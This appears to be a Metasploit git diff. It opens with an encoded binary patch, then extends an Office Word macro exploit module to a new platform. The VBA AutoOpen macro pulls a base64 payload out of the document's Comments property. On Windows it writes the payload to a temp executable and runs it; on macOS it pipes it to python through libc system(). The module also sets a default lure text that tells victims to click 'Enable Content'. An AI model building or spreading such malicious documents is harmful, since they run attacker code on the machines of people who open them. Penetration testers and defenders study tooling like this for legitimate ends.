z?8U@&4@6Asi+Ro{cs`5qB&pHTj&$HA0QL1{0BV^P0BULaYK)4enN$XB_cz$?uc~XR
zuB@$Ztf<`7R9jKq=xnN}^Z4p2TwY(L(_3Bdt?|}8fM4D+Oj`}+CD6vT%`jtdm!E@Q
zj2I3p4KvH3{2VffHrVv#5b|hN!ZG|RMiO>WD%%OvZY7?;ugPG_jKPM1+jdoz4YsQK
zs>(|Izy}fdc5G{~`D^@}DqU5Z8VPF5K%BLCLE-XORo3`wD{D0Xew(ks=JWfSkXw_l
zzRKhC5cp~km7jB0b2O2Z8%L5#1izGmUykXE-kqN_Qyo_W1XES%udQ}g_?qgS6)u+#
zf@!R-s&G0zPG7yt<#g6~9=H{A#jP``oIGbNeeOx%x5yM^Xckt3vs|9}_dz;_nY^I}
oXo5}kRrG5!mF4o@{2cT&a-`uO{QjTO3I9yK9YX!D|NX!J2giQayZ`_I

literal 17920
zcmeHu3v^u7dG0=EMx)Wo9t+#ZkJwvd*&5l>Ff)2sGM1T#o}iZ{#deH98qFL@V~=Kr
znIlWK0gr4G970x2fIu3Om`Cp|siB6nzR=!e3DVw@ELICm?pjV(*Nq&wt@}vpK$5aZ
zs_FOdbB;8U1sJ;0uCA3W{b%p<pZ)yzzhB?}=Z(KwHT&cX>o2n<ZVxlDxlA6jWbq}0
ziG;H;CL=)abD2y=V={)|Z{2?*3H%%Cny2@n8Gb&9`aBn81ySE_gufb82r2@t0IdW;
z1=uQ3G3W+R4rmQ%E$Bv231}T?J!k{yQy|K36a38}4k`r^@3-#1MgqMojz1NB(ad7-
zlk6yZ<oexO^tw^=f{#dMQ=Sb!ea~M@CdBiS0>JHKe&*AHpXh1D3}lo~`7Y;-at%K_
zPCpxC5td?2kV1$}uyLjcIb_HAu<&{&OH@9M8S+0YZuYnHdS$y%-X!Z}L6n|E9a7nm
zt|Pn}<<q#Ox%hg^r+!jtaKcF-N=wzDd}s`3kAIpQXilIs+2fza?9%a1bHsAvpW@Q^
zr+H+#@oxuz3#bgV6|@ah4sw7hK-)n(K$V~>kP~zh$OUqPJfLb&4X74W2igg$2Q`3p
zfo=xv1~r2AfNlYKL8N<rPyo~fY6i7{T0w1~cF?V$+dv(lPEZ$!+R+1lFQ^yP2kHlX
z8nh3zA4G9J1OFiCcF+Lm4$z&TLC_E=2pR^3Kw*#q8Uc-h#y}C!A<$t^6f_Qsf#RS9
z=q?bILwZC0gzitmp90ZnJ_b4tx*J4svYoV6V$xN7cwT1g2k?Icji3mBjQ2bf7;vN{
zu`3smS0?i`!e>Ai5tit~yxM8m66fPP8<J3Aq<*yY7*&)ctNuofq40+~ZTxkj6BjC@
z@r=s;7+)xh!ucYMqW-ge2Wla+K0B35BJQ)zhjbpk@78!m?Inx}H}o%#xndl;6UA8g
zpc%{%oFuhTNolR;ZD_YB8M7A2fgF`Vj>5D?Z`FD9Zt%&cbea?WE`r2295IY=w*O)L
z>~GoO?DQ0t#At4u8a$Z8eoPTRshj&ARbFJdNVkZCZus&A=2O*VWOzbl3g71+><VH@
z;EmkgKZbRpDIS^_S7J8RUX-8zpg)+B<Okhd@#J_gDm&NhYmLT-gV9py8-0mjNQ$-u
zt<jWH_*5XN1Z`??IJ#zYPg3DwB@_)ZOM7?~`&xf;qR8Jom9WNB%Ib~%%6NiBgR0V`
zBqQ>XHD!T`lo}r|j2t^1IOX1y+01D^w1a4n<bjf(PUD$P7`OLgq@Ms=?9?b0In6ie
zgGh$%$+T+=cPUe<$<q{J<9sAO5epBpBf;o|!hNaJypPSqMvL-IUb%%GY7U0Rc!DM4
z3Em##J{D3VM-&J|Vr?<i>7R&19cp_lXJrrDsw7=%L`j+UNcXgl<jA|7InM>+<KtLb
z)s&t0k0~o+x#iN1yw5lC&PZ9<Ax%2>Nl#SrjkR^=H>5SwQal;4j7|@*lMt~|$7-6C
zP&}+SOx7(Amh>qqA4$n^Rzh-B71lj`NC~M9JL?N2BMCJUW24TNNL1-N+LKb1@l!?i
z2f50|6N4l1Xjri%A;7K9Rz>YgCzMbm7;TXY!Vb^bl2}mwzt&AVX1IO8&UZ|=NTp|~
zL#EF<D$;qgcBe9>u)n=8HElY4a=_dWdezyVzRS16k?UI{mAw9`5$FD7q{#b#<G%L4
z%nd~2skO>&L!WQn|D9%M-xyP(QG126cfuUw4{d0Ug?am)kw9_aF`s$nsaGB<$~TvD
z(@2U3`S3J5R8?2QmDuzlYnZ2A{R(&Z`&fT3SC1x?3fU<Yx*HlAcopLwm#c>RVqP^K
zi^TZM{wPzDm3&N96KvN_H%(4XI>%XDjSojuXQ(MY?k{q>+}@%Tk4KLvsp+o{N7KqU
zpNyzu?0H*ANu_3r!@OKdpGyRxq)kDy8hm9-Id`<jwy<xrww8&Q_oaBu!}A~UA5EV-
z>8z{CoynW|+^fCi$&rwItk&a}_LTc8zp%Y?`a9*kFFvA9rZ;Y}++?;mL&v0*fp|$Q
zrJmk6GiCSrS)i%8rM0d7R(4xQXIFR6-d@(%|LJ}E4}9hz3l4|E%E&18Wrq$&$7AsX
zyDOPeCyq=`v7^UaZclYh?M&Uy`i31h4Yy7om&1HxhY}k_D=K-adqS<`Y&034Ncfde
zOT-_y-<VX!<40@?pB#I#Ih6?B$F^3^H1J^T=w;LWrDcD<DSbn)l8AcEvg5mQB|kD8
zNDg(3RC4=U$_dNp&w`fz;P9YDI)2JIl(UiBEtcUMhtBX+JUx*NDSUil$RUS#MI@!B
z_{dl?K7Q&`DU)}Ga~2=rH9RyHoJ;=X;rqADte-L6x?bKr^w_F1=FWI{CU^H9ZgI6e
z#{a<C8;qpt74GIYJlj&b#vfc8{_|a?JDh)Zta&POx61G9EM3<;7L<al+{?S-lRPZ{
zF8`(CyI|kBD`<N1#lNdh--yKhaqd{tr=C?3yvCQq`72&)Y+^ikhySRm^rR|zfbqb&
zZ>y!#=<x_9E^tbvC(V^S);ir(`8rSVmQ&Vp{?v@GFmP)7+mk6ikqEA=W;_^DCxTJ_
z?O|UbpYna_*%j&4)q%WUohq1>T%UV=tk`E7&VMWC4bIE?Z0N}B_uk?+Ufy}Gh+T-V
zQ@jqEnojv{e)5J&``y8CS(wl6=#RHrgRvx^$x%jUEU%Q${%K+;o(v|Bva_>nbV_k@
z|D8_-o+)_c(ekp!^3p9z@^7Ch=W^s+QB2_@%49s9=eIw(iCG=z_Rc&Il7@=nvFK4g
ztVrx@<H4!O_{4aFwA#aG^3GlPpT+9fo0ntpsPgtX=S<h{nFhC3&z6>6{>Skvn|Bm^
z%KaA(^VJ;(%=Sk6nH`(gzsU19RPkhIQ05m)-+f`-FY=nB-woYmd2@?RZhW!dG3)xi
z>*1}{+l~xh@<(DlH?BTVF>`RA<zLpgZpeM6pe(1#=KRsg(Vg#m;ydlZoul@l&p&K!
zUYn_@pSIjv@0Z?=KDuJtj>O@6xBtLBbZqO&ki7rVcd^%PQ>J(-5sd_9+Jc*+@z`jv
zs_wX{roX-BuXo&F8nK);Id1w6yRcEpTb<(@s){Oq77Sk<<;N8E^}9_+`+6O9J!>v^
zl$o!ta$U7o@NK6Hs!e_DY~o9?leJQQ^{Y4Yv7v&$d(?Bz99*5Mc&Gk<x!?Zksh|0-
zZVHSg9f22`XC3x!ZT7U~^7ilKK2^DQucxA7?-vHEb64=$?HT#!D=K+)<v;U`oRNPi
z*S;%%GpCO^%P-&ZCzTg@YPv8!u}6J`zbjAQHB>mvw(;2xWkhv6RFvo$>$~NPCDohu
znoL_mU-%;vR+3efJMWmb%5?g;fR&1+^XRE<GtzltYyKK>5QmN(R@xLIOb|nf7B<s1
z-=&8s>X;sf!U+l^A97+vUy?sT4^w)4f+-#s@vUY$a$L~UQvR2;IA+>J+01xMTSd5p
z!rA$QPj%xu--~d)9;R*AR91LK4-*_>rH$_5d@LKmaxB9qxTTHw(^e~m59nd4+n5%%
zh_>r|%4aHz|F|BewCD6VeuOVjco2VmIKlM5r*qWDbvEoGs3Me?wuSoW90)t2;|96x
z^63osaUIGR=Wi;T-1VfV4tP|LIH)5KgOETk>&98H8D~K{$z7kr`CqhKEB*S)r#<#j
zI!wcbal%V#!B6zGeuDD5QPM75{-_CUCE+ep7s9=)`*{}a-L3n3b^mj^U!kXaR)5bU
zHGuQ!{G<B&-|K#Zz7hS5?%$>RU)KHa>V5-_d$=_A>8ok4F0-85AlNGNP{th2pmt>v
zE2<&A3ulTdactZ>l(~H%V;;+_4`=3*2Qn)qwhnI@Uwy{RcC{hN9lxrst<P+fC049|
zu&^QbR0d2|vLTmkurhOfCO;3yLipyA%v=|{(b1NX*;c${{PmeaoX~##%lGD(+x*@f
z@?61w^@xa>@i{X2c)2pS%bHn<z@@og|MIoDIt#1MI5Jn}SOH=evwveR&9VCO`php#
zyylnY%t*Eh5Ni3Ex$;YM<yYo@L5(JE0l?O}d_DQ4xifQUY5}S}mpYK4xoI^;B(&z|
zkWbU1Lop#F#xZ#yV`2wD@6E|5TV}6;rf`lbL950<4iT5m|7JS>hcP?-0RAP2oRs-z
zcz<q{cJ`-Uh+R3+OJ8VWB)8o8-;D3t*N^+WzVrXQ&VEq#TJhI&{x4ZHYK_tRpXv9A
zM%3j~nG{_A$b6_{nUHm!Hy@IBZ`1|86erNSjZy%jfz%3$x5)=Ip$(BoU&v`J?fvdd
z$2_0D+$b>o(*l<nI_;1t{uIcnmq}?0ifaTP3Nl3R6o(vz$!Xzy_Bg^C;vxZgy9Kub
z4@!jhw4d4|(o;P8Zlpn}Kq5HvKH{DKPPL=&vTu8y_q2bWZ=|EMpZ9drHGD08%QgHf
z$jf`W_Zq%})0g*j|22F%fO${vyM|wdbC~z^fou3UhVAm6K6nkE+TcAsa1Ea)l5tI5
zn%t<r<WprL9?5)`Mxl`Cf}D)_*{F>T{Z0HUh)@13CLB8JFLm^7siQKN^0MDw5_QmW
z!jviE(pz?%?68^rK2m6?jZ_98cL0m*i2k=70InZ^Z4fj9z_uO$uA524dNeouEnw^f
zJ}TK3F+&t@DXVUQ<(f|_t<V!{tdajXcC?S#r>%g<b%A34XU68|4O;Zl+8$A?cZ>IS
z*dtbn>oVHIl|cQ)<U4IG6njvTAi}gio27gZ-j2&NF+m_)jDg50Q-rsn<@I`))`2vL
z_%wfd^)RiU7xZu${Ht1?R#Ji)jgLAPu-6baqb)K<;v2-zuJe*Gtvi?WIJ@B6ND&aH
z4PFnz{^>%<q>w$X^Tl3M4-?#eL4>U`LFiZYFxB5nVqCIEw}W+n_}KT8e9~Fr$MtXt
z_`f|rXgekvaFEr1&G`ZPOkMIG?P^d53PTYV>k|0X*H+?-@q+V`7RL;ZHi<x&==kB#
z<B<LgEfa_OJ)y_3BYb9=I6~h<oDwr#eOz58j*Ifq#)X;kJg0?as?bXm&enhEAq}}1
z@U`*6*lP%r+$CuYpS~p8L6<x4n7xRZVVrH3=kTnQOPN!C7(8;sEoBzzA~tOT4+R{W
z!=3=&BhzyC4D)+GixvB)*j=rkM>7pDldwz;>MUdR*vdLtog5MuLO(^?F`46iD>nA@
z<rxBTE41=l@_EdyW$b;7^m68qYnrr@{HRfQkig!<Xv=$e%do#-SK-I;eg*z4$jP_{
zz6x*>XsiZK5*!P35=eP$lmJQtpL8OLNC(_V!zm4zQbQ?Q;?byqQW_wofl<cka*Nz7
z$cOa6D|r>5Ho_}uc^r=FfF<{Z2(SeB3B(eT)DcTS?5LoCEc?`C1^bfq0A+{#WR}Ya
zr36T+zt=NSJzs2by*jnZXz(R)Pz_H-P4y3eGSScGi_FV>egnibFiZo&G!RS!z%=kn
z1HRPI%Xh3ViP~v;Lo@I@W|I0lW}G#Iqk3;(0>32qGNLL#iGpZ(C2t=g1XGKK-rs}X
zzg517_cGQdo6ygDWYRa{cPz`lh(b8@EIS32SI+>?L*_cVnNoQu9!qKPCeTeTu+@}+
zjX7{vZlIh=+(1%!8&I|%Ws~Cwoo8kkjhx4u1)8q8^C<fwRto{{>)8H9n34E{VXpCX
z&2n<qCHuWSXc4(%(90h9q_1u8slHen1tcmi2)IIb6rzf>O3^rM!8oMyjJnXlpT=p4
zM3Q!iXPbBqiRYAfp2d^$H<SL0i;r+n4Qe?9nkVfic$6^LY6Bk~2F{ui`hOlPYB}pg
z+vy@3TR_HHzo-X8T}<qYlsViiWU>pWY&>>ENvc}q0T?F%xGG5=focLi1$+<4euPs6
zDuu=e!(kp#Q8uOb1D}miTxAq#TH;BLX(A!eR0t9NDBx6~E`&uJS<_%HZ!E9m>X?#L
z^n4;HM*~=qlV~qB38@`W30w(;P>>F^BDoH<Qq??^7cPY;pBotE32g=9YV=}-)?7$|
z^sxohFBgbjp;?J!wNGdahfjLhh#eK_3KuezpeZCxk{!wOfE=d&7w^=sUgWnAbf^4T
zktf9#`v;*X9Pv2bNe9SSh4MWQy}4HZHVge*5E3rA7Aqt2$<{_qA7>;@A8BiRo_P`H
zpu7^#185=jJvE)?RoWSmKJAzXd(o{VDS~@RkLnf;ts2qqlo*ckEMr5M*|i)gpH<8U
zHHa#~FwMZnlw>@G@+~6n21tzL=)!C;AjyKaYQ8pFJ?gOnX=+E6sOHqwd<;0Wp-PTA
zp)jcmP08owf^q&ouzuZuvdTagA<J!TR6~+5NmlFARqQ}h85>5OvtyW+jZv^DPR<9!
zDQ5#hnp*uU7!3nla5Q0D&=p5&LBCT}<@kiE>mS<R1pOEQ^+Jw+gF2Ela8yLUX!326
z%UO*afnL#W`MdghPAmK@-Z@syGJGfbd*oxtXAJB0Ma*mawJS&5@Zo|FEvI$a@7;|j
z-Aqz?+D(vDwAFb^<e_Tq*u|MD^nC!kaqW8yUq~95cW~QC8Z-tD<@5Vi&BxLHTNgj*
zj=D>MEm1H8U9cCi{Jx1{?!!HHygQ-992G_8e9l;Rj5jB7iJRoTN@}7MwSx--))@lT
z6D|b00<7o~=nROqN`;_b{~wBpt-0pSTLhwB^N!*f4l*pph6zuJELu(o{y&>!$=(Uf
z)3A2Z?yu=vS|<wIK-%VZ0bM0Nm1TyQr|AVkg&SgwY#0qkEa4pNS>emjN;YJ^CQ?v*
z#W%Q>gh<21jA~-Ura?4v;gb{J^+zwPbVgw-7RAx^_2AR!5thkALy6utYgtlM3Db?t
z=EMoK6&5%y@#n#_1}Jk2j)WS=wI~$OxeH&7Smf8hy6GOAi)*kjdEhsI0$4-_bo{y%
z2W%g^7stc_@Vi+j{<>i?qH#K5&lC_icc0GD?C%D26nrOgrIf^N#>v|Wo2U-_Z2^a@
z<R;MKD8o_;KP7q*)48xl;V3nMzo_5_VM!PPKeoi4%_b29uviuiXjSbZ2^j6ILS41+
zhs&ZK^{hi3U0JdqTe?vo>p^Ugsg4oUOhIi1Addy@i$gQX_OV+)62w;!Bm2#bx>1@w
zSafwma!n|!8xrxOtmSgrFQgGho|MvwI#KS!u;EgWJC)Ue@`pvumfBkW?`1Wm8hI?V
zKRa}N((#B|WJ_m1Y7k>#)O1ovBn2z66zZlxR@Km|0r5uPNoJH@MQ9i;rj|FO4L)cB
z<`u+W=;`bcqG33JMV3m-@&4xEpteFHv1490Jdkn=Hlj^vc@1=+3X=4L<3q>|o*Qpf
zpeEGC&>SDWYU86u=X=CBq1x}fZruooHo<BF^7&}3>4Sw{5Iw0tmZUW;_@nXFEc#y4
znr@VDjG^W9C0o}%iOvwHBVidX#ALWamKdRb#h}#)uLYIpIHS=!8Wv~FmYT0EEQ@&y
zZwvOd**qh^1wVF0259v`)@ZBIJGY>>7Qnu0NG+2o#Z~YJrO9N-<WM-8>Q|bmqQy|E
zr6#kK`L#%5CQ~La7dw-on+$R#l<hZh$)UAOlIp=&XytE1zX=J@vi(u{QpbE$oZr;<
zzdG{3k>~oJ=)4fCE;X6YAER<4=*jUfeBXTYT^;TB-?s9HkvD&Q&ft^ZhVN+*?24sE
zW|9(B6yD3EH0&**wj<`k{qbb@j}P0Jsc@g)_pd*(u^jXMNX%XL%DsB9+LL=i57yO8
zA!ssVEBDP8ZOm*&lDg-%=%Jm@Ba~a%lZ=zuTh;S6X0fK!FwR>K4<USpqev6ej1qr*
zX@S!{G7<?XYbI>0un@+KhApGI`)f9qmxjQRYOtB`AZ%Sreh6kE_LJIn^7%tHW<Bqa
zND$akiXG(-x7%<pso4w)lfh@sqlOGPP2vzzuV6mILXb=*)$b430DO~~Agly+J4zLe
zNZ{xTTfxCUMdR5%GCh3zHWbES0ys+O)H_|MuwHaFU@+>1h}cLf{tv%{2u!mD)bO$Q
z9-!hw!aA@Y=8a?w_}On!^xlcs;2Vf;9wxiO8lXftJ-z=Jgk;w8&WzYtzL^fcno*hO
z%OrKOE8DPvz8I!uk=WkX(F=@B$AHL;tUwlwY{xoA{t#lwK^S&pp$00nIhl;3Mmdb^
zyp)okQ~B8km%Cjg$N)~~0T^K7=>IgTXf>0S7BQcA(|Dt!&QX;r8*3#Kx1#-2xdbZb
z`<@Ly$vH9%qa>J7>4@0tU!~GvTlDqEDF9oa+n{XoUG0Z-lY`x{x_6QPX<RXxBxdx>
zq3?sI>x2r+$yjh)S&dFzY3PZT*!c9-3y{s?Pw1Fmb)a237v`2^O9^XQWnCf3sxvj}
zk54_;yAWki%aioyu{{g<Q5nK;GwB|-u~mypS@`%B$jr7-Sf6g%Nfw{Uy-+=~{tX93
zwdN15DV5kk8%kw*H98~VpC({kLKyE5!w;1(B^i^_RxGSW*otr_lYiY4mbM_Tm+4@$
zQ8wYZNv4Z5SsZ#K9B!_4RNB0g(+Gk?d&$o*sqV!zZtw-mwOy9a=CQ<TOPh(Elv(&~
z-1Fq(XBYZZk+YZXoxJjDi@dt=IXOR9j!LVomf}3QIIZmq3gugicgy)}nFNc=unkkn
z9(f&Y4aIH|yTKludB@n+JDCX^`PSnum&@b2P*d%yg1(vqEZ-!rkcwfJT6fPD=5e~V
zxV8jvHo-&}j!$CqojOV&cD30vU{X9zHHtlDcSkcFQq%GApc;wC*pLagp3U0qm4iS!
zAWYr&rdw7po?exgmbMoT1Wd*G7TP?TWp=7mOl+%8k76&Crp^7DlcQftZ+_%tY3p%p
zC0pv7Tr~mgA^k1BDmN@({Z;;^=GyeA?~pI8)TDDfXGYV1g0n(!oYO?XQUip|$77P&
z(ix$%bexT-ybmK08@++<mX`Jac6hY|oqgTTrjm}1E%)0_b#iwtce;4@@bp`}V<s|8
z){N<`X=Yz}@)+!_UzM;uTIW}^d6x+za<!G^m(1k#&y3K~%HA~7h94k#+ZFbW*i3Bw
zUlw?NRIqWT7(LeJm)!o(tu*1}y~!_2IhC)LUVP-J-EZCDm)5cAJGq#qr9G|ef#P&d
z7dt>dC^~$Gj@VmMZ2jl+ws{`O>*n8F)y+@zt}T6aQ-IrEg~F0XXWL)VN&n+IvcDn>
zfllkR5?)VwLJ)c_TFmV737Y@7j_l8<T*F;Y`XnM9)FUpo`kEBiDc6&S5eL7&`q<@T
zIEmjEQ67uSH*&pxpX5)|16}%(46Y~T5kz`|62U!u+xDk%YCuR!OXea*NK7;MLOd-x
zAsWm7NkRj*4+ON43s?s!(nxF&rl@<tT0~Gl@s1tRy#@t!3}y||Y7melU?03P(Ng$z
zHy{6j-F0`@{q|$`J^p^}Pf$3r*Wee5M^z?a;BW-FP{?rf?PYqvNmk!H$aELoU&2wm
zgcj6usL;Q(&&PnNoE{^Gy@Dn!=ia2TwTycK&0Nk=ODU_hr{22Vn%>y;;?u|7&wcU4
zx8Fp&mUCds1h!@G<B+vX`OI(HXo%C;)Te)>G5rfBOmZ{g$y$mKg@#>V*FaBicWbZj
zUiUztyR);q3xUq|KyP;+0@!{M?Q~MGd8f0fqXU)2;)UP3`F#*^{yJR_BtJ9Mh3etc
zc`xYx;^~EIlcO2`&evuIGOg8XlZ=lVGjeJ`pNBCGYn#{s%@dRG{_fr;XLpC6T1(QR
zjkc(g-UU=8GT0#J(|IrJzE^OK2UW?nL_k0s<;{oy0qLulv50vFv`x2I$Ea{BLSs?!
z6?#uo@p@@&ug?3j?)Mla3!jSbc;mgQ_ix`|`_}(w-(XGu54$5K-=Y<dUd)n+wnT{q
zD_cBbl`<A7V~y(QFsi4CjjBh3g`8GB4Fz`Vyq9%<NW?H6sI#~RH@5$XBvdeaPmVZ6
zh1iTkYPv%#)72&2OuUz`<>koiA$^b;HmFoPihX!VY?LEW8C}2==oh;XeE~!T?1eBX
z;?QrIQ`qz}39SWsNx0<%_&|CKYQX6O8kfXoA%S>=hK&NJF;K$3EIce5yMq)9kd#W3
z$S|c9`KdrJ2sca2*9EaGMmx?>bT~tH#^^zvPGIQeKBNg=^up`7FnU~zj!o9$Z+-ao
zlKu@tOX3J?rT3v^LKY*Ug@naMu~$>jHk4Ta*#Vgvz<^{0AcVjvAjvrqX9@&?7hu>i
z!q4c>FaDO6KZWuyAr?79){9g4ffMQ&KMNnx6o5)(8A;~w)`Mt(kRzXZi-VTO|EbSt
z3L!^2U^wGl`(~onSZNx}KF!7F>%sAb$}yaFsmspb4x+e6ptrF_6X*v5QCV~9GU$_$
zJ$#Pe|HfzwihiJ8&|Li!&t!(aqLCN=!~V&K-@_+rMSD}D{kYFp=ke4xHB>d%@AOpF
z;I~ax^)1bTs@f)ZZEb_w?Q=CW-Gg5o8mF_y>}mg|ZEe_w3s;nn9~MnSmB#rcpeUbC
zT#a^p2|ylgN;H9+KNZJfD%%CtJ|&sL)?1t!)d-9%sy&VN>V|5M2fr|*2!YPlM!Ub-
z@2++Gn(KXjPc~7#di;&{7FUbM?P;oYS8D`*YoO8YY4WrLT0DVjcU^t8hp1sEJ{9HP
z-WG>(LGzTV#BfBz?eR$bj-vee#<&}gS0i#$U5%?M(9+<la=Qa9RrSp^)m1K+&lP}J
zT&`N*JvU=a-8`SlC340Ra99{hAj51?HM%PK{C@zlG2o5HTCj<BHdG@}=c(iei}JnL
zoe^eBvjd^_pBCM@d>?B){qdgz{}i7iS}tYwJrnI&mvfn~V{GJRGIRJ9#2h;T+6>AC
a(QnY{#)EMEB-%iZG?Errj8%=Z^4|e_d6Inq

diff --git a/external/source/exploits/office_word_macro/macro.vba b/external/source/exploits/office_word_macro/macro.vba
index 7e115b0319..03da5fb676 100644
--- a/external/source/exploits/office_word_macro/macro.vba
+++ b/external/source/exploits/office_word_macro/macro.vba
@@ -1,3 +1,5 @@
+Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
+
 Sub AutoOpen()
     On Error Resume Next
     Dim found_value As String
@@ -6,17 +8,31 @@ Sub AutoOpen()
         If prop.Name = "Comments" Then
             found_value = Mid(prop.Value, 56)
             orig_val = Base64Decode(found_value)
-            Set fso = CreateObject("Scripting.FileSystemObject")
-            tmp_folder = fso.GetSpecialFolder(2)
-            tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
-            Set f = fso.createTextFile(tmp_name)
-            f.Write (orig_val)
-            f.Close
-            CreateObject("WScript.Shell").Run (tmp_name)
+            #If Mac Then
+                ExecuteForOSX (orig_val)
+            #Else
+                ExecuteForWindows (orig_val)
+            #End If
+            Exit For
         End If
     Next
 End Sub
 
+Sub ExecuteForWindows(code)
+    On Error Resume Next
+    Set fso = CreateObject("Scripting.FileSystemObject")
+    tmp_folder = fso.GetSpecialFolder(2)
+    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
+    Set f = fso.createTextFile(tmp_name)
+    f.Write (code)
+    f.Close
+    CreateObject("WScript.Shell").Run (tmp_name)
+End Sub
+
+Sub ExecuteForOSX(code)
+    system ("echo """ & code & """ | python &")
+End Sub
+
 
 ' Decodes a base-64 encoded string (BSTR type).
 ' 1999 - 2004 Antonin Foller, http://www.motobit.com
@@ -27,12 +43,10 @@ Function Base64Decode(ByVal base64String)
   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
   Dim dataLength, sOut, groupBegin
   
-  'remove white spaces, If any
   base64String = Replace(base64String, vbCrLf, "")
   base64String = Replace(base64String, vbTab, "")
   base64String = Replace(base64String, " ", "")
   
-  'The source must consists from groups with Len of 4 chars
   dataLength = Len(base64String)
   If dataLength Mod 4 <> 0 Then
     Err.Raise 1, "Base64Decode", "Bad Base64 string."
@@ -40,18 +54,12 @@ Function Base64Decode(ByVal base64String)
   End If
 
   
-  ' Now decode each group:
   For groupBegin = 1 To dataLength Step 4
     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
-    ' Each data group encodes up To 3 actual bytes.
     numDataBytes = 3
     nGroup = 0
 
     For CharCounter = 0 To 3
-      ' Convert each character into 6 bits of data, And add it To
-      ' an integer For temporary storage.  If a character is a '=', there
-      ' is one fewer data byte.  (There can only be a maximum of 2 '=' In
-      ' the whole string.)
 
       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
 
@@ -69,18 +77,14 @@ Function Base64Decode(ByVal base64String)
       nGroup = 64 * nGroup + thisData
     Next
     
-    'Hex splits the long To 6 groups with 4 bits
     nGroup = Hex(nGroup)
     
-    'Add leading zeros
     nGroup = String(6 - Len(nGroup), "0") & nGroup
     
-    'Convert the 3 byte hex integer (6 chars) To 3 characters
     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
     
-    'add numDataBytes characters To out string
     sOut = sOut & Left(pOut, numDataBytes)
   Next
 
diff --git a/modules/exploits/windows/fileformat/office_word_macro.rb b/modules/exploits/windows/fileformat/office_word_macro.rb
index f13e9a2925..7e8f4406c3 100644
--- a/modules/exploits/windows/fileformat/office_word_macro.rb
+++ b/modules/exploits/windows/fileformat/office_word_macro.rb
@@ -36,18 +36,30 @@ class MetasploitModule < Msf::Exploit::Remote
           'EXITFUNC' => 'thread',
           'DisablePayloadHandler' => true
         },
-      'Platform'       => 'win',
       'Targets'        =>
         [
-          ['Microsoft Office Word', {}],
+          [
+            'Microsoft Office Word on Windows',
+            {
+              'Platform' => 'win',
+            }
+          ],
+          [
+            'Microsoft Office Word on Mac OS X (Python)',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Jan 10 2012",
-      'DefaultTarget'  => 0
+      'DisclosureDate' => "Jan 10 2012"
     ))
 
     register_options([
-      OptString.new("BODY", [false, 'The message for the document body', '']),
+      OptString.new("BODY", [false, 'The message for the document body',
+        'Contents of this document are protected. Please click Enable Content to continue.'
+      ]),
       OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
     ], self.class)
   end
@@ -60,8 +72,9 @@ class MetasploitModule < Msf::Exploit::Remote
     when /document\.xml/
       buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
     when /core\.xml/
+      p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
       b64_payload = ' ' * 55
-      b64_payload << Rex::Text.encode_base64(generate_payload_exe)
+      b64_payload << Rex::Text.encode_base64(p)
       buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
     end